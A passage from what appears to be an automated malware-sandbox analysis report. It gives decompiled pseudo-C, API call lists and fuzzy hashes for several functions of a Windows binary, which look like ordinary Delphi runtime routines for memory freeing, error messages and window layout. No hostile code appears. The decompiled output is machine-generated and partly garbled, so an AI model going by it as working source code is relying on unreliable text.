						L00401404();
					}
					_push(0x4965c4);
					L0040140C();
					return 0;
				}
			}










                                                                        0x00401b65
                                                                        0x00401b6f
                                                                        0x00401c43
                                                                        0x00401b75
                                                                        0x00401b77
                                                                        0x00401b78
                                                                        0x00401b7d
                                                                        0x00401b80
                                                                        0x00401b8a
                                                                        0x00401b8c
                                                                        0x00401b91
                                                                        0x00401b91
                                                                        0x00401b96
                                                                        0x00401b9d
                                                                        0x00401ba3
                                                                        0x00401baa
                                                                        0x00401baf
                                                                        0x00401bc9
                                                                        0x00401bc2
                                                                        0x00401bc7
                                                                        0x00401bc7
                                                                        0x00401bd6
                                                                        0x00401be0
                                                                        0x00401bea
                                                                        0x00401bef
                                                                        0x00401bf6
                                                                        0x00401bfa
                                                                        0x00401c01
                                                                        0x00401c06
                                                                        0x00401c0b
                                                                        0x00401c11
                                                                        0x00401c14
                                                                        0x00401c17
                                                                        0x00401c23
                                                                        0x00401c25
                                                                        0x00401c2a
                                                                        0x00401c2a
                                                                        0x00401c2f
                                                                        0x00401c34
                                                                        0x00401c39
                                                                        0x00401c39

                                                                        APIs
                                                                        • RtlEnterCriticalSection.KERNEL32(004965C4,00000000,1!), ref: 00401B91
                                                                        • LocalFree.KERNEL32(0069CC50,00000000,1!), ref: 00401BA3
                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,0069CC50,00000000,1!), ref: 00401BC2
                                                                        • LocalFree.KERNEL32(0069BD00,?,00000000,00008000,0069CC50,00000000,1!), ref: 00401C01
                                                                        • RtlLeaveCriticalSection.KERNEL32(004965C4,00401C41,0069CC50,00000000,1!), ref: 00401C2A
                                                                        • RtlDeleteCriticalSection.KERNEL32(004965C4,00401C41,0069CC50,00000000,1!), ref: 00401C34
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                        • String ID: 1!
                                                                        • API String ID: 3782394904-1845855088
                                                                        • Opcode ID: 3a7b233517acf5c95cbb18c7fe32d53daa30e1684477b17213130cd6556bc65b
                                                                        • Instruction ID: 05849b501fd87baf2c0356682b7521c0f28bcc268fec1476372dd4ef7659d9e7
                                                                        • Opcode Fuzzy Hash: 3a7b233517acf5c95cbb18c7fe32d53daa30e1684477b17213130cd6556bc65b
                                                                        • Instruction Fuzzy Hash: 10118E706483806EEB11AB66AC81B167B999714718F17807BF404A66FAD67D9C40CB1D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040A0C8, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50filewindowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040A0C8(void* __edi) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t10;
				char* _t12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t22;
				long _t26;
				void* _t34;

				E00409F40(_t10,  &_v1024, _t34, 0x400);
				_t12 =  *0x495b34; // 0x496048
				if( *_t12 == 0) {
					_t14 =  *0x495914; // 0x40759c
					_t7 = _t14 + 4; // 0xffe8
					_t16 =  *0x496714; // 0x400000
					LoadStringA(E00405AAC(_t16),  *_t7,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t22 =  *0x49595c; // 0x496218
				E00402D34(_t22);
				_t26 = E00408BF8( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff5),  &_v1024, _t26,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff5), 0x40a178, 2,  &_v1092, 0);
			}













                                                                        0x0040a0d7
                                                                        0x0040a0dc
                                                                        0x0040a0e4
                                                                        0x0040a137
                                                                        0x0040a13c
                                                                        0x0040a140
                                                                        0x0040a14b
                                                                        0x00000000
                                                                        0x0040a161
                                                                        0x0040a0e6
                                                                        0x0040a0eb
                                                                        0x0040a0fb
                                                                        0x0040a10e
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 00409F40: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409F5D
                                                                          • Part of subcall function 00409F40: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409F81
                                                                          • Part of subcall function 00409F40: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409F9C
                                                                          • Part of subcall function 00409F40: LoadStringA.USER32 ref: 0040A032
                                                                        • GetStdHandle.KERNEL32(000000F5,?,00000000,?,00000000), ref: 0040A108
                                                                        • WriteFile.KERNEL32(00000000,000000F5,?,00000000,?,00000000), ref: 0040A10E
                                                                        • GetStdHandle.KERNEL32(000000F5,0040A178,00000002,?,00000000,00000000,000000F5,?,00000000,?,00000000), ref: 0040A123
                                                                        • WriteFile.KERNEL32(00000000,000000F5,0040A178,00000002,?,00000000,00000000,000000F5,?,00000000,?,00000000), ref: 0040A129
                                                                        • LoadStringA.USER32 ref: 0040A14B
                                                                        • MessageBoxA.USER32 ref: 0040A161
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: File$HandleLoadModuleNameStringWrite$MessageQueryVirtual
                                                                        • String ID: H`I
                                                                        • API String ID: 1802973324-3946158073
                                                                        • Opcode ID: 46a409c553fa7b0eaac4b9152b14505e0718eae20c8bb15c3c42cbfd28e4cb2f
                                                                        • Instruction ID: 164a82ec87427e02c43d68d6289cc30817225284fd7a8bc5127b03f5bcef9bb4
                                                                        • Opcode Fuzzy Hash: 46a409c553fa7b0eaac4b9152b14505e0718eae20c8bb15c3c42cbfd28e4cb2f
                                                                        • Instruction Fuzzy Hash: 46016DB1614300AAE200F7A4CC46F9B77EC9B45718F50463BB755FA0E2DA78E9148B3B
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004041CC, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 79%
                                                                        			E004041CC(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x496048 == 0) {
					if( *0x47a01c == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x49621c == 0xd7b2 &&  *0x496224 > 0) {
						 *0x496234();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E00404254, 2,  &_v4, 0);
				}
			}





                                                                        0x004041d4
                                                                        0x00404234
                                                                        0x00404244
                                                                        0x00404244
                                                                        0x0040424a
                                                                        0x004041d6
                                                                        0x004041df
                                                                        0x004041ef
                                                                        0x004041ef
                                                                        0x0040420b
                                                                        0x0040422c
                                                                        0x0040422c

                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,004798C4,00000000,?,0040429A,?,?,?,00000001,0040433A,00402863,004028AB,?,00000000), ref: 00404205
                                                                        • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,004798C4,00000000,?,0040429A,?,?,?,00000001,0040433A,00402863,004028AB), ref: 0040420B
                                                                        • GetStdHandle.KERNEL32(000000F5,00404254,00000002,004798C4,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,004798C4,00000000,?,0040429A), ref: 00404220
                                                                        • WriteFile.KERNEL32(00000000,000000F5,00404254,00000002,004798C4,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,004798C4,00000000,?,0040429A), ref: 00404226
                                                                        • MessageBoxA.USER32 ref: 00404244
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: FileHandleWrite$Message
                                                                        • String ID: Error$Runtime error at 00000000
                                                                        • API String ID: 1570097196-2970929446
                                                                        • Opcode ID: 4761f131ddf98c97f3b1034989d57503ea3da9a4de15842b6ca85224d8e130d7
                                                                        • Instruction ID: 196c44c3e04e492743d3cd85247e7e05a160b8e68fe7c0a1ee4f43ec710e7497
                                                                        • Opcode Fuzzy Hash: 4761f131ddf98c97f3b1034989d57503ea3da9a4de15842b6ca85224d8e130d7
                                                                        • Instruction Fuzzy Hash: FEF0BBA078438075FA2077649D07F9E224C47D1F19F604AFFB314B40E286BC44C4572E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0042EE4C, Relevance: 12.1, APIs: 8, Instructions: 146COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 68%
                                                                        			E0042EE4C(void* __eax, void* __ecx, void* __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				struct HDWP__* _v28;
				int _v32;
				char _v36;
				struct tagTEXTMETRICA _v92;
				void* __ebx;
				void* __ebp;
				struct HDC__* _t85;
				void* _t88;
				void* _t111;
				char _t115;
				intOrPtr* _t117;
				void* _t142;
				signed int _t145;
				long _t146;
				signed int _t156;
				intOrPtr _t158;
				struct HDC__* _t173;
				int _t174;
				void* _t177;
				void* _t179;
				intOrPtr _t180;
				intOrPtr _t186;

				_t177 = _t179;
				_t180 = _t179 + 0xffffffa8;
				_t142 = __eax;
				_t85 =  *(__eax + 0x210);
				if( *((intOrPtr*)(_t85 + 8)) == 0 ||  *((char*)(__eax + 0x220)) != 0) {
					return _t85;
				} else {
					_push(0);
					L00406EB4();
					_t173 = _t85;
					_t88 = SelectObject(_t173, E0041F478( *((intOrPtr*)(__eax + 0x68)), __eax, __ecx));
					GetTextMetricsA(_t173,  &_v92);
					SelectObject(_t173, _t88);
					_push(_t173);
					_push(0);
					L00407124();
					_t174 =  *( *((intOrPtr*)(_t142 + 0x210)) + 8);
					_t145 =  *(_t142 + 0x21c);
					asm("cdq");
					_v8 = (_t174 + _t145 - 1) / _t145;
					asm("cdq");
					_v12 = ( *((intOrPtr*)(_t142 + 0x48)) - 0xa) / _t145;
					_t146 = _v92.tmHeight;
					_v24 =  *((intOrPtr*)(_t142 + 0x4c)) - _t146 - 5;
					asm("cdq");
					_v16 = _v24 / _v8;
					asm("cdq");
					_t34 = _v24 % _v8;
					_t156 = _t34 >> 1;
					if(_t34 < 0) {
						asm("adc edx, 0x0");
					}
					_v20 = _t156 + _t146 + 1;
					_v28 = BeginDeferWindowPos(_t174);
					_push(_t177);
					_push(0x42efd5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t180;
					_t111 =  *( *((intOrPtr*)(_t142 + 0x210)) + 8) - 1;
					if(_t111 >= 0) {
						_t115 = _t111 + 1;
						_t186 = _t115;
						_v36 = _t115;
						_v24 = 0;
						do {
							_t117 = E00414208( *((intOrPtr*)(_t142 + 0x210)), _v24);
							_t170 = _t117;
							 *((intOrPtr*)( *_t117 + 0x70))();
							asm("cdq");
							_v32 = _v24 / _v8 * _v12 + 8;
							if(E004037D8(_t117, _t186) != 0) {
								_v32 = E00435FB0(_t142) - _v32 - _v12;
							}
							asm("cdq");
							_v28 = DeferWindowPos(_v28, E0043CC2C(_t170), 0, _v32, _v24 % _v8 * _v16 + _v20, _v12, _v16, 0x14);
							E004364CC(_t170, 1);
							_v24 = _v24 + 1;
							_t81 =  &_v36;
							 *_t81 = _v36 - 1;
						} while ( *_t81 != 0);
					}
					_pop(_t158);
					 *[fs:eax] = _t158;
					_push(0x42efdc);
					return EndDeferWindowPos(_v28);
				}
			}






























                                                                        0x0042ee4d
                                                                        0x0042ee4f
                                                                        0x0042ee55
                                                                        0x0042ee57
                                                                        0x0042ee61
                                                                        0x0042efe2
                                                                        0x0042ee74
                                                                        0x0042ee74
                                                                        0x0042ee76
                                                                        0x0042ee7b
                                                                        0x0042ee87
                                                                        0x0042ee93
                                                                        0x0042ee9a
                                                                        0x0042ee9f
                                                                        0x0042eea0
                                                                        0x0042eea2
                                                                        0x0042eead
                                                                        0x0042eeb2
                                                                        0x0042eebb
                                                                        0x0042eebe
                                                                        0x0042eec7
                                                                        0x0042eeca
                                                                        0x0042eed0
                                                                        0x0042eed8
                                                                        0x0042eede
                                                                        0x0042eee2
                                                                        0x0042eee8
                                                                        0x0042eee9
                                                                        0x0042eeec
                                                                        0x0042eeee
                                                                        0x0042eef0
                                                                        0x0042eef0
                                                                        0x0042eef6
                                                                        0x0042eeff
                                                                        0x0042ef04
                                                                        0x0042ef05
                                                                        0x0042ef0a
                                                                        0x0042ef0d
                                                                        0x0042ef19
                                                                        0x0042ef1c
                                                                        0x0042ef22
                                                                        0x0042ef22
                                                                        0x0042ef23
                                                                        0x0042ef26
                                                                        0x0042ef2d
                                                                        0x0042ef36
                                                                        0x0042ef3b
                                                                        0x0042ef44
                                                                        0x0042ef4a
                                                                        0x0042ef54
                                                                        0x0042ef64
                                                                        0x0042ef73
                                                                        0x0042ef73
                                                                        0x0042ef83
                                                                        0x0042efa6
                                                                        0x0042efad
                                                                        0x0042efb2
                                                                        0x0042efb5
                                                                        0x0042efb5
                                                                        0x0042efb5
                                                                        0x0042ef2d
                                                                        0x0042efc0
                                                                        0x0042efc3
                                                                        0x0042efc6
                                                                        0x0042efd4
                                                                        0x0042efd4

                                                                        APIs
                                                                        • 72E7AC50.USER32(00000000), ref: 0042EE76
                                                                          • Part of subcall function 0041F478: CreateFontIndirectA.GDI32(?), ref: 0041F5B6
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0042EE87
                                                                        • GetTextMetricsA.GDI32(00000000,?), ref: 0042EE93
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0042EE9A
                                                                        • 72E7B380.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042EEA2
                                                                        • BeginDeferWindowPos.USER32 ref: 0042EEFA
                                                                        • DeferWindowPos.USER32(?,00000000,00000000,?,?,?,00000000,?), ref: 0042EFA1
                                                                        • EndDeferWindowPos.USER32(?,0042EFDC,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042EFCF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: DeferWindow$ObjectSelect$B380BeginCreateFontIndirectMetricsText
                                                                        • String ID:
                                                                        • API String ID: 2543476052-0
                                                                        • Opcode ID: 218aff618e0d1c92c010e9e46c08f2c33b00da450782674677ceb1564e956cea
                                                                        • Instruction ID: f4d01097e73c3804610282b1e03a132fba9f815ae9591d249fd19601606493d4
                                                                        • Opcode Fuzzy Hash: 218aff618e0d1c92c010e9e46c08f2c33b00da450782674677ceb1564e956cea
                                                                        • Instruction Fuzzy Hash: B6414271A00119AFDB00DFA9C985AEEBBF5EF48304F154066F904E7391D7389D41CB64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0045325C, Relevance: 12.1, APIs: 8, Instructions: 138windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 74%
                                                                        			E0045325C(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v22;
				intOrPtr _v28;
				struct HWND__* _v32;
				char _v36;
				intOrPtr _t50;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t68;
				intOrPtr _t83;
				void* _t88;
				intOrPtr _t120;
				void* _t122;
				void* _t125;
				void* _t126;
				intOrPtr _t127;

				_t123 = __esi;
				_t122 = __edi;
				_t125 = _t126;
				_t127 = _t126 + 0xffffffe0;
				_push(__ebx);
				_push(__esi);
				_v36 = 0;
				_v8 = __eax;
				_push(_t125);
				_push(0x4534ec);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				E00434E0C();
				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2ec) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
					_t50 =  *0x495a24; // 0x41d59c
					E00406548(_t50,  &_v36);
					E0040A17C(_v36, 1);
					E00403DA8();
				}
				if(GetCapture() != 0) {
					SendMessageA(GetCapture(), 0x1f, 0, 0);
				}
				ReleaseCapture();
				 *(_v8 + 0x2ec) =  *(_v8 + 0x2ec) | 0x00000008;
				_v32 = GetActiveWindow();
				_t58 =  *0x47aaf8; // 0x0
				_v20 = _t58;
				_t59 =  *0x496c08; // 0x215094c
				_t60 =  *0x496c08; // 0x215094c
				E00414284( *((intOrPtr*)(_t60 + 0x7c)),  *((intOrPtr*)(_t59 + 0x78)), 0);
				_t63 =  *0x496c08; // 0x215094c
				 *((intOrPtr*)(_t63 + 0x78)) = _v8;
				_t64 =  *0x496c08; // 0x215094c
				_v22 =  *((intOrPtr*)(_t64 + 0x44));
				_t66 =  *0x496c08; // 0x215094c
				E004546C4(_t66,  *((intOrPtr*)(_t59 + 0x78)), 0);
				_t68 =  *0x496c08; // 0x215094c
				_v28 =  *((intOrPtr*)(_t68 + 0x48));
				_v16 = E0044D650(0, 0x496c04, _t122, _t123);
				_push(_t125);
				_push(0x4534cc);
				_push( *[fs:edx]);
				 *[fs:edx] = _t127;
				E004531AC(_v8);
				_push(_t125);
				_push(0x45342b);
				_push( *[fs:edx]);
				 *[fs:edx] = _t127;
				SendMessageA(E0043CC2C(_v8), 0xb000, 0, 0);
				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
				do {
					E004563FC( *0x496c04, _t122, _t123);
					if( *((char*)( *0x496c04 + 0x9c)) == 0) {
						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
							E0045310C(_v8);
						}
					} else {
						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
					}
					_t83 =  *((intOrPtr*)(_v8 + 0x24c));
				} while (_t83 == 0);
				_v12 = _t83;
				SendMessageA(E0043CC2C(_v8), 0xb001, 0, 0);
				_t88 = E0043CC2C(_v8);
				if(_t88 != GetActiveWindow()) {
					_v32 = 0;
				}
				_pop(_t120);
				 *[fs:eax] = _t120;
				_push(0x453432);
				return E004531A4();
			}


























                                                                        0x0045325c
                                                                        0x0045325c
                                                                        0x0045325d
                                                                        0x0045325f
                                                                        0x00453262
                                                                        0x00453263
                                                                        0x00453266
                                                                        0x00453269
                                                                        0x00453273
                                                                        0x00453274
                                                                        0x00453279
                                                                        0x0045327c
                                                                        0x0045327f
                                                                        0x0045328b
                                                                        0x004532b4
                                                                        0x004532b9
                                                                        0x004532c8
                                                                        0x004532cd
                                                                        0x004532cd
                                                                        0x004532d9
                                                                        0x004532e7
                                                                        0x004532e7
                                                                        0x004532ec
                                                                        0x004532f4
                                                                        0x00453300
                                                                        0x00453303
                                                                        0x00453308
                                                                        0x0045330b
                                                                        0x00453313
                                                                        0x0045331d
                                                                        0x00453322
                                                                        0x0045332a
                                                                        0x0045332d
                                                                        0x00453336
                                                                        0x0045333c
                                                                        0x00453341
                                                                        0x00453346
                                                                        0x0045334e
                                                                        0x00453358
                                                                        0x0045335d
                                                                        0x0045335e
                                                                        0x00453363
                                                                        0x00453366
                                                                        0x0045336c
                                                                        0x00453373
                                                                        0x00453374
                                                                        0x00453379
                                                                        0x0045337c
                                                                        0x00453391
                                                                        0x0045339b
                                                                        0x004533a1
                                                                        0x004533a3
                                                                        0x004533b1
                                                                        0x004533cc
                                                                        0x004533d1
                                                                        0x004533d1
                                                                        0x004533b3
                                                                        0x004533b6
                                                                        0x004533b6
                                                                        0x004533d9
                                                                        0x004533df
                                                                        0x004533e3
                                                                        0x004533f8
                                                                        0x00453400
                                                                        0x0045340e
                                                                        0x00453412
                                                                        0x00453412
                                                                        0x00453417
                                                                        0x0045341a
                                                                        0x0045341d
                                                                        0x0045342a

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                        • String ID:
                                                                        • API String ID: 862346643-0
                                                                        • Opcode ID: d23c847d7f57aea184321512c31775f2395633f8dc318a8c35cf2f43c479741c
                                                                        • Instruction ID: 1e7db2e0920272a233e48265ae69c26bb7b820731f5faa072b4b138cd3cd441e
                                                                        • Opcode Fuzzy Hash: d23c847d7f57aea184321512c31775f2395633f8dc318a8c35cf2f43c479741c
                                                                        • Instruction Fuzzy Hash: A8512E30A006449FDB00EF6AC946B9E77F5EF49745F1140BAF804AB3A2D778AE44DB48
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043AD08, Relevance: 12.1, APIs: 8, Instructions: 123COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0043AD08(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				int _v16;
				char _v20;
				struct tagRECT _v36;
				signed int _t54;
				intOrPtr _t59;
				int _t61;
				void* _t63;
				void* _t66;
				void* _t82;
				int _t98;
				struct HDC__* _t99;

				_t99 = __edx;
				_t82 = __eax;
				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
				_v16 = SaveDC(__edx);
				E00434EE8(__edx, _a4, __ecx);
				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
				_t98 = 0;
				_v12 = 0;
				if((GetWindowLongA(E0043CC2C(_t82), 0xffffffec) & 0x00000002) == 0) {
					_t54 = GetWindowLongA(E0043CC2C(_t82), 0xfffffff0);
					__eflags = _t54 & 0x00800000;
					if((_t54 & 0x00800000) != 0) {
						_v12 = 3;
						_t98 = 0xa00f;
					}
				} else {
					_v12 = 0xa;
					_t98 = 0x200f;
				}
				if(_t98 != 0) {
					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
					DrawEdge(_t99,  &_v36, _v12, _t98);
					E00434EE8(_t99, _v36.top, _v36.left);
					IntersectClipRect(_t99, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
				}
				E00437760(_t82, _t99, 0x14, 0);
				E00437760(_t82, _t99, 0xf, 0);
				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
				if(_t59 == 0) {
					L12:
					_t61 = RestoreDC(_t99, _v16);
					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
					return _t61;
				} else {
					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
					if(_t63 < 0) {
						goto L12;
					}
					_v20 = _t63 + 1;
					_v8 = 0;
					do {
						_t66 = E00414208( *((intOrPtr*)(_t82 + 0x19c)), _v8);
						_t107 =  *((char*)(_t66 + 0x57));
						if( *((char*)(_t66 + 0x57)) != 0) {
							E0043AD08(_t66,  *((intOrPtr*)(_t66 + 0x40)), _t99, _t107,  *((intOrPtr*)(_t66 + 0x44)));
						}
						_v8 = _v8 + 1;
						_t36 =  &_v20;
						 *_t36 = _v20 - 1;
					} while ( *_t36 != 0);
					goto L12;
				}
			}
















                                                                        0x0043ad13
                                                                        0x0043ad15
                                                                        0x0043ad17
                                                                        0x0043ad23
                                                                        0x0043ad2d
                                                                        0x0043ad3f
                                                                        0x0043ad44
                                                                        0x0043ad48
                                                                        0x0043ad5d
                                                                        0x0043ad77
                                                                        0x0043ad7c
                                                                        0x0043ad81
                                                                        0x0043ad83
                                                                        0x0043ad8a
                                                                        0x0043ad8a
                                                                        0x0043ad5f
                                                                        0x0043ad5f
                                                                        0x0043ad66
                                                                        0x0043ad66
                                                                        0x0043ad91
                                                                        0x0043ada3
                                                                        0x0043adb2
                                                                        0x0043adbf
                                                                        0x0043add7
                                                                        0x0043add7
                                                                        0x0043ade7
                                                                        0x0043adf7
                                                                        0x0043adfc
                                                                        0x0043ae04
                                                                        0x0043ae43
                                                                        0x0043ae48
                                                                        0x0043ae4d
                                                                        0x0043ae59
                                                                        0x0043ae06
                                                                        0x0043ae09
                                                                        0x0043ae0c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043ae0f
                                                                        0x0043ae12
                                                                        0x0043ae19
                                                                        0x0043ae22
                                                                        0x0043ae27
                                                                        0x0043ae2b
                                                                        0x0043ae36
                                                                        0x0043ae36
                                                                        0x0043ae3b
                                                                        0x0043ae3e
                                                                        0x0043ae3e
                                                                        0x0043ae3e
                                                                        0x00000000
                                                                        0x0043ae19

                                                                        APIs
                                                                        • SaveDC.GDI32 ref: 0043AD1E
                                                                          • Part of subcall function 00434EE8: GetWindowOrgEx.GDI32(?), ref: 00434EF6
                                                                          • Part of subcall function 00434EE8: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 00434F0C
                                                                        • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043AD3F
                                                                        • GetWindowLongA.USER32 ref: 0043AD55
                                                                        • GetWindowLongA.USER32 ref: 0043AD77
                                                                        • SetRect.USER32 ref: 0043ADA3
                                                                        • DrawEdge.USER32(?,?,?,00000000), ref: 0043ADB2
                                                                        • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043ADD7
                                                                        • RestoreDC.GDI32(?,?), ref: 0043AE48
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
                                                                        • String ID:
                                                                        • API String ID: 2976466617-0
                                                                        • Opcode ID: 7579a09f0e1fb688d0282343193c5f5ef11fca35c4dbc9b8d67e96162047c833
                                                                        • Instruction ID: 5230efab144cf00d1e86c4fe0b99e01b1b6c0be5c34e2f34689cb1fb78e5a635
                                                                        • Opcode Fuzzy Hash: 7579a09f0e1fb688d0282343193c5f5ef11fca35c4dbc9b8d67e96162047c833
                                                                        • Instruction Fuzzy Hash: 98417171B002056BDB10EBA9CC81FAF77A9AF48304F10516AF905EB396DB79DD0187A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0045DC38, Relevance: 12.1, APIs: 8, Instructions: 102COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
